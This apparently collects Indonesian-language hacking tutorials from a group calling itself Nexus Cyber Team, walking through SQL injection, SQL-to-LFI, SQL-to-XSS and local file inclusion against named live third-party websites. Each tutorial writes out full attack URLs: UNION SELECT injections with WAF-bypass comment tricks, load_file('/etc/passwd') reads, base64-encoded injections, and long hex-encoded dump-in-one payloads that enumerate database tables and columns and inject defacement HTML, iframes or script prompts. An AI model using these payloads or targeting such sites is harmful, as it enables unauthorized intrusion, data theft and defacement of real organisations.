TUTORIAL SQL TO LFI

 Assalamualaikum



Balik lagi ma gua Noub93 Gans*; Kali ini akan tutor Sql To Lfi

Bahan"

->Payload Lfi load_file('/etc/passwd')

-> Live Target : http://tf.lan.go.id/statis-1-profil.html

Lanjut aja ke tutor nya

Kayak biasa pertama" kita kasih ' untuk cek vuln atau tidak

http://tf.lan.go.id/statis-1'-profil.html

Nah kasih ' nya sesudah angka 1 ye:v

Terus lu searc ke google/crome maka akan menjadi seperti ini


Lalu kalian tambahin order by nya 

Contoh : http://tf.lan.go.id/statis-1'+order+by+1--+--profil.html

Maka akan menjadi seperti ini


Nah disini error,lalu langsng aja ganti order by nya menjadi union select

Contoh : http://tf.lan.go.id/statis-1'+union+select--+--profil.html

Hapus aja angka 1 nya

Maka akan menjadi seperti ini


Nah,lalu kalian masukin payload nya

Contoh : http://tf.lan.go.id/statis-1'+union+select+load_file('/etc/passwd')--+--profil.html

Nah maka akan menjadi seperti ini


Nah sudah itu kalian tinggal view-source aja biar muncul hasilnya:v

Contoh : view-source:tf.lan.go.id/statis-1'+union+select+load_file('/etc/passwd')--+--profil.html

Nah maka akan menjadi seperti ini

Duar boom:v



Oke begitu ya


Sekian tutor nya jika ada kesalahan moon maaf:v

Jangan lupa follow ig @nexuscyberteam

ThanksTo : Dark_193N - Akshan - Badboy - Dan all Member NCT

#Nexus Cyber Team

LOCAL FILE INCLUSION (LFI) #1

 Assalamualaikum





Balik lagi ma gua Noub93 Gans:v, Mengtutor Local File Inclusion (LFI) #1

Local File inclusion (LFI), or simply File Inclusion, refers to an inclusion attack through which an attacker can trick the web application into including files on the web server by exploiting a functionality that dynamically includes local files or scripts. The consequences of a successful LFI attack include Directory Traversal and Information Disclosure as well as Remote Code Execution.


Typically, Local File Inclusion (LFI) occurs, when an application gets the path to the file that has to be included as an input without treating it as untrusted input. This would allow a local file to be supplied to the included statemen


Local File Inclusion is very much like Remote File Inclusion (RFI), with the difference that with Local File Inclusion, an attacker can only include local files (not remote files like in the case of RFI).t.FI).


LANJUT AE KE TUTOR:V


Bahan"

->Exploit : 

-‎ /etc/passwd

-‎ /etc/resolv.conf

-‎ /proc/version

-‎ /etc/resolv.

-‎ /proc/version

->Live Target : https://lab.fotoforensics.com/faq.php?

Maka tampilan seperti ini


Itu tampilan awal belom di apa"in:v

Lanjut....

Sebelum lu kasih Exploit,lu kasih page / show dulu

Contoh : https://lab.fotoforensics.com/faq.php?show=

                https://lab.fotoforensics.com/faq.php?page=

Nah seperti itu


Oke lanjut,sekarang lu tambahin aja Exploit nya bebas...

Contoh : /etc/passwd

Contoh gua pake yang show=

Jadi https://lab.fotoforensics.com/faq.php?show=/etc/passwd

Maka hasilnya akan menjadi seperti ini



Nah seperti itu, selesai dech,tamat:v


Sekian dan jika ada kesalahan moon maaf 

Gua manusia biasa jadi suka khilaf:v

Wassalamu'alaikum


ThanksTo : Dark_193N,Badboy,Akhsan,Killermoon And -> All Member NCT


#Nexus Cyber Team



TUTORIAL SQL STRUCTURED QUERY LOVE CHALL

 Assalamualaikum



Balik lagi sama gua Noub93 Gans:v Kali ini seperti biasa mengtutor:v SQL STRUCTURED QUERY LOVE CHALL


Bahan"

->Dios

->Bypas wap

AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/


Chall/live target : http://www.icdcprague.org/index.php?id=-40


Lanjut ae ke tutor nya


Pertama" kalian tempel ae chall/live target tadi di google atau crome:v


Nah muncul tampilan awal seperti itu

Oke sekarang kita  cek vuln atau tidak,dengan cara tambahin ' sesudah param/id 

Contoh : http://www.icdcprague.org/index.php?id=40'

Maka akan seperti ini


Nah itu Vuln....

Lanjut klean tambahin order by nya

http://www.icdcprague.org/index.php?id=40'+order+by+1--+-

Maka muncul seperti ini


Oke kembali ke halaman semula

Kalian naikin aja angka nya sampe nemu yg error

order+by+1--+-

order+by+2--+-

order+by+3--+-

Oke percepat gua nemu yg eror di angka 7



Nah,otomatis angka togel nya ada di angka 6

Cara mencari angka togel nya kita ganti

Order+by menjadi union+select

Karna web ini harus pake bypas wap jadi kita gunain bypas wap

AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/


Contoh : http://www.icdcprague.org/index.php?id=-40'+AND+0+/*!50000%55niON*/+/*!50000%53eLeCt*/+1,2,3,4,5,6--+-

Nah maka akan menjadi seperti ini 


Nah muncul angka togel nya kalian tinggal tempel aja dios di angka togel nya


Dan boom jadi hasil nya



Oke sekian dan jika ada kesalahan mohon maaf:)

Wassalamu'alaikum


ThanksTo : Dark_193N,Akhsan,Badboy, Killermoon


#Nexus Cyber Team

TUTORIAL SQL PARAMETER HTML

 Assalamualaikum




Gua Noub93 Gans:v Kali ini akan mengtutor Sql Parameter Html


Bahan"

->Dios

->Kuota -_


Live Target : https://kramatdjati-garuda.com/statis-1-profil.html

Langsng aja tempel di crome atau google


Nah itu tampilan semula,belom di apa"in:v

Oke lanjut kita cek vuln atau tidak dengan cara Tambahin ' sesudah angka 1 

Maka tampilan akan menjadi seperti ini


Nah itu tandanya Vuln Sql 

Oke lanjut ke order by nya

Contoh :

https://kramatdjati-garuda.com/statis-1'+order+by+1--+--profil.html

Nah seperti itu,maka tampilan akan menjadi seperti ini


Nah kembali kesemula lagi...

Lalu kalian naikin aja angka nya sampe nemu yg error

order+by+1--+-

order+by+2--+-

order+by+3--+-

Prcepat ae.....

Disini gua nemu error nya di angka 8

Contoh : https://kramatdjati-garuda.com/statis-1'+order+by+8--+--profil.html

Nah maka tampilan akan menjadi seperti ini


Nah sekarang lanjut ke union select nya

Nah kan tadi error nya di angka 8,jadi sudah pasti angka ajaib/togel di angka 7 

Cara untuk nemuin nya begini 

Contoh : https://kramatdjati-garuda.com/statis--1'+union+select+1,2,3,4,5,6,7--+--profil.html

Jangan lupa kasi - sebelum angka 1 ye.....

Oke lanjut maka tampilan akan menjadi seperti ini


Nah angka togel nya muncul,tinggal tempel aja dioa di no togelnya


Contoh :

https://kramatdjati-garuda.com/statis--1'+AND+1=0+UNION+SELECT+1,CoNcAt/**/(0x3c63656e7465723e272c273c696d67207372633d2268747470733a2f2f672e746f7034746f702e696f2f705f313838373771636868322e706e6722206865696768743d223330307078222077696474683d22333030707822272c273c2f63656e7465723e272c273c2f62723e272c273c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e272c274e6f756239332047616e73272c273c2f666f6e743e272c273c2f62723e3c696672616d652077696474683d22302522206865696768743d223022207363726f6c6c696e673d226e6f22206672616d65626f726465723d226e6f22206c6f6f703d22747275652220616c6c6f773d226175746f706c617922207372633d2268747470733a2f2f612e746f7034746f702e696f2f6d5f31383933777971796b302e6d7033223e3c2f696672616d653e,database(),version(),sysdate(),(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=concat+(@x,0x3c62723e,table_name,0x203a3a20,column_name))))x)),3,@@Hostname,5,6,7--+--profil.html


Maka hasil nya :


Gua Noub93,Sekian Terimakasih:v

Wassalamu'alaikum


Thankto : Dark_193N,Akhsan,Killermoon,Badboy


#Nexus Cyber Team

TUTORIAL SQL TO XSS

 Assalamualaikum




Balik lagi sama gua Noub93 kali ini gua bakal kasih tutorial SQL TO XSS

Bahan²

-chall

-payload = CoNcAt/**/(0x3c7363726970743e70726f6d70742822,0x4e6f756239332047616e73,0x7c7c,user/**/(),0x7c7c,version(),0x7c7c,database/**8**/(),0x7c7c,(select(@x)/*!50000From*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000Information_schema.columns*/)/*!50000Where*/(table_schema=database/*data*//**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x7c7c,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x),0x222c646f63756d656e742e646f6d61696e293c2f7363726970743e)

Live Target : 

https://www.epilepsymichigan.org/page.php?id=365

Oke seperti biasa kita cek vuln atau tidak dengan cara tambahin '




Nah kaya gitu ,vuln oke lanjut....

Nah error ya oke lanjut ke order by

order by 1--+-

order by 2--+-

order by 3--+-

Sampe nemu yang error


Nah gua nemu yang error di angka 11 

Langsung kita union select..... Biar nemu angka togel:v

Caranya : https://www.epilepsymichigan.org/page.php?id=-365%27+union+select+1,2,3,4,5,6,7,8,9,10--+-

Jangan lupa tambahin - sesudah param / id=

Biar nemu angka togel:v






Nah angka togel nya ketemu, kita masukin payload ke angka togel nya 

Nah seperti itu ....
Hasilnya :

Oke cukup sekian Terimakasih Bila ada kesalahan maaf:)
Wassalamu'alaikum


#Nexus Cyber Team

Tutorial SQL BASE64 EASY

 Assalamualaikum



Lanjut lagi bersama Noub93 Gans :v 

Akan kasih tutor Base64 Ez-_


Alat tempur :

-> Apk Codec (download di play store)

-> Dork : 

Inurl:/php?id=MQ==

Inurl:/php?Id=NQ==

Inurl:/php?id=NW==

-> Dios

Live Target : http://www.knotsolutions.com/job.php?id=MQ==

Oke seperti biasa kita cek vuln atau ngga nya

Cara cek vuln nya? Kalian buka terlebih dahulu apk codec


Kalian ganti Ascii jadi Base64 

Jika sudah kalian tempel id nya tadi MQ==

Di kotak bawah 


Nah terus kalian kasi tanda ' di angka 1

Lalu salin aja code yang muncul, yg gua buletin:v


Lalu tempel di http://www.knotsolutions.com/job.php?id=

Contoh : http://www.knotsolutions.com/job.php?id=MSc=

Lalu kalian tempel di google/crome untuk mengecek vuln atau tidak

Nah gambar akan menjadi seperti ini


Lalu kalian order by seperti biasa......

Cuma disini beda tidak memakai (+)

Contoh : 


Kalian salin aja code nya lalu tempel lagi di id= contoh

http://www.knotsolutions.com/job.php?id=MSBvcmRlciBieSAxLS0gLQ==

Lalu tempel ke google/crome maka tampilan akan menjadi seperti


Oke lanjut ,kita ganti oder by menjadi union select 

Tapi kita kasi - sesudah param .... Contoh 


Lalu kalian salin lagi code dibawah nya tempel kan di id= atau param:v

Contoh : http://www.knotsolutions.com/job.php?id=LTEgdW5pb24gc2VsZWN0IDEsMiwzLS0gLQ==

Kalian cek kaya tadi biar nemu angka togel:v,maka tampilan akan menjadi seperti ini


Nah angka togel dah ketemu lngsng aja kalian tempel dios nya di angka togel tersebut 

Contoh : gua memilih yang 2 


Lalu kalian salin code dibawah tempel kan aja sesudah param atau id= (ngerti kan)

Contoh : http://www.knotsolutions.com/job.php?id=LTEgdW5pb24gc2VsZWN0IDEsQ29OY0F0LyoqOCoqKi8oMHgzYzYzNjU2ZTc0NjU3MjNlMjcyYzI3M2M2OTZkNjcyMDczNzI2MzNkMjI2ODc0NzQ3MDczM2EyZjJmNjcyZTc0NmY3MDM0NzQ2ZjcwMmU2OTZmMmY3MDVmMzEzODM4MzczNzcxNjM2ODY4MzIyZTcwNmU2NzIyMjA2ODY1Njk2NzY4NzQzZDIyMzMzMDMwNzA3ODIyMjA3NzY5NjQ3NDY4M2QyMjMzMzAzMDcwNzgyMjI3MmMyNzNjMmY2MzY1NmU3NDY1NzIzZTI3MmMyNzNjMmY2MjcyM2UyNzJjMjczYzY2NmY2ZTc0MjA2MzZmNmM2ZjcyM2QyMjYyNmM2MTYzNmIyMjIwNzM2OTdhNjUzZDIyMzUyNTIyM2UyNzJjMjc0ZTZmNzU2MjM5MzMyMDQ3NjE2ZTczMjcyYzI3M2MyZjY2NmY2ZTc0M2UyNzJjMjczYzJmNjI3MjNlM2M2OTY2NzI2MTZkNjUyMDc3Njk2NDc0NjgzZDIyMzAyNTIyMjA2ODY1Njk2NzY4NzQzZDIyMzAyMjIwNzM2MzcyNmY2YzZjNjk2ZTY3M2QyMjZlNmYyMjIwNjY3MjYxNmQ2NTYyNmY3MjY0NjU3MjNkMjI2ZTZmMjIyMDZjNmY2ZjcwM2QyMjc0NzI3NTY1MjIyMDYxNmM2YzZmNzczZDIyNjE3NTc0NmY3MDZjNjE3OTIyMjA3MzcyNjMzZDIyNjg3NDc0NzA3MzNhMmYyZjYxMmU3NDZmNzAzNDc0NmY3MDJlNjk2ZjJmNmQ1ZjMxMzgzOTMzNzc3OTcxNzk2YjMwMmU2ZDcwMzMyMjNlM2MyZjY5NjY3MjYxNmQ2NTNlCiwweDU1NTM0NTUyM2EzZSxjdXJyZW50X3VzZXIsMHgzYzYyNzIzZSwweDU2NDU1MjUzNDk0ZjRlM2EzZSx2ZXJzaW9uKCksMHgzYzYyNzIzZSwgMHg1MDRjNTU0NzQ5NGUzYTNlLEBAcGx1Z2luX2RpciwgMHgzYzYyNzIzZSwgMHg1MzU5NGQ0YzQ5NGU0YjNhM2UsQEBHTE9CQUwuaGF2ZV9zeW1saW5rLCAweDNjNjI3MjNlLCAweDQ4NGY1MzU0NGU0MTRkNDUzYTNlLEBAaG9zdG5hbWUsIDB4M2M2MjcyM2UsMHgzYzY2NmY2ZTc0MjA2MzZmNmM2ZjcyM2QyMjYyNmM3NTY1MjIzZSwoc2VsZWN0KEB4KS8qITUwMDAwRnJvbSovKC8qITUwMDAwc2VsZWN0Ki8oQHg6PTB4MDApLChzZWxlY3QoMCkvKiFGcm9tKi8oLyohNTAwMDBJbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyovKS8qITUwMDAwV2hlcmUqLyh0YWJsZV9zY2hlbWE9ZGF0YWJhc2UvKmRhdGEqLy8qKjgqKi8oKSlhbmQoMHgwMClpbihAeDo9LyohNTAwMDBjb05jYXQqLyhAeCwweDNjNmM2OTNlLC8qITUwMDAwdGFibGVfbmFtZSovLDB4M2EzYSwvKiE1MDAwMGNvbHVtbl9uYW1lKi8pKSkpeCkpCiwzLS0gLQ==

Nah kalian tempel aja di google/crome maka tampilan akan menjadi seperti ini


Oke sekian aja tutor dari gua,cukup sekian Terimakasih


#Nexus Cyber Team





Tutorial Sql local varielabel

 Assalamualaikum


Disini gua Noub93 Gans akan mengtutor:v Sql Poc local variabel

Pertama" seperti biasa

Siapin alat" nya 

-> dios


Live target : http://www.ampak.com.tw/product.php?id=21


Oke lanjut seperti biasa

Kita cek vuln atau tidak terlebih dahulu ,cara nya tambahin '


Nah itu Vuln,oke lanjut kita order+by--+-

Caranya

http://www.ampak.com.tw/product.php?id=21+order+by+1--+-

Kalian naikin terus angka nya sampe nemu yang error

Nah disini gua nemu yang error di angka 9

http://www.ampak.com.tw/product.php?id=21+order+by+9--+-


Nah berarti angka ajaib/togel nya di no 8 !!!

Cara manggil nya ?

Kalian ganti order+by jadi union+select

Karna itu harus pake bypas jadi gua gunain yang

AND+MOD(9,9)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/+

Contoh : http://www.ampak.com.tw/product.php?id=21+AND+MOD(9,9)+/*!50000UNION/**_**/*/+/*!50000SELECT/**_**/*/+1,2,3,4,5,6,7,8--+-

Nah angka togel nya muncul (3)



Oke lanjut..... Cara variabel nya ?

Kita tambahin and mod (9,9) div@nicklu:=dioslu 

Ini lu tambahin habis angka parameter

Terus angka togel nya lu ganti jadi @nicklu 

Contoh : http://www.ampak.com.tw/product.php?id=21+and%20mod%20(9,9)%20div@Noub93:=CoNcAt/**8***/(0x3c63656e7465723e272c273c696d67207372633d2268747470733a2f2f692e6962622e636f2f637666376643732f32303230303630372d3232343531352e706e6722206865696768743d223330307078222077696474683d22333030707822272c273c2f63656e7465723e272c273c2f62723e272c273c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e4e6f756239332047616e733c2f666f6e743e3c2f62723e3c666f6e7420636f6c6f723d22626c61636b222073697a653d223525223e4e65787573204379626572205465616d3c2f666f6e743e3c62723e,0x555345523a3e,current_user,0x3c62723e,0x56455253494f4e3a3e,version(),0x3c62723e,%200x504c5547494e3a3e,@@plugin_dir,%200x3c62723e,%200x53594d4c494e4b3a3e,@@GLOBAL.have_symlink,%200x3c62723e,%200x484f53544e414d453a3e,@@hostname,%200x3c62723e,0x3c666f6e7420636f6c6f723d22626c7565223e,(select(@x)/*!50000From*/(/*!50000select*/(@x:=0x00),(select(0)/*!From*/(/*!50000Information_schema.columns*/)/*!50000Where*/(table_schema=database/*data*//**8**/())and(0x00)in(@x:=/*!50000coNcat*/(@x,0x3c6c693e,/*!50000table_name*/,0x3a3a,/*!50000column_name*/))))x))+/*!50000UNION/****/*/+/*!50000SELECT/****/*/+1,2,@Noub93,4,5,6,7,8--+-



Hasil :



Jadi gitu tutor sql local variabel


Sekian Terimakasi:) Wassalamu'alaikum


#Nexus Cyber Team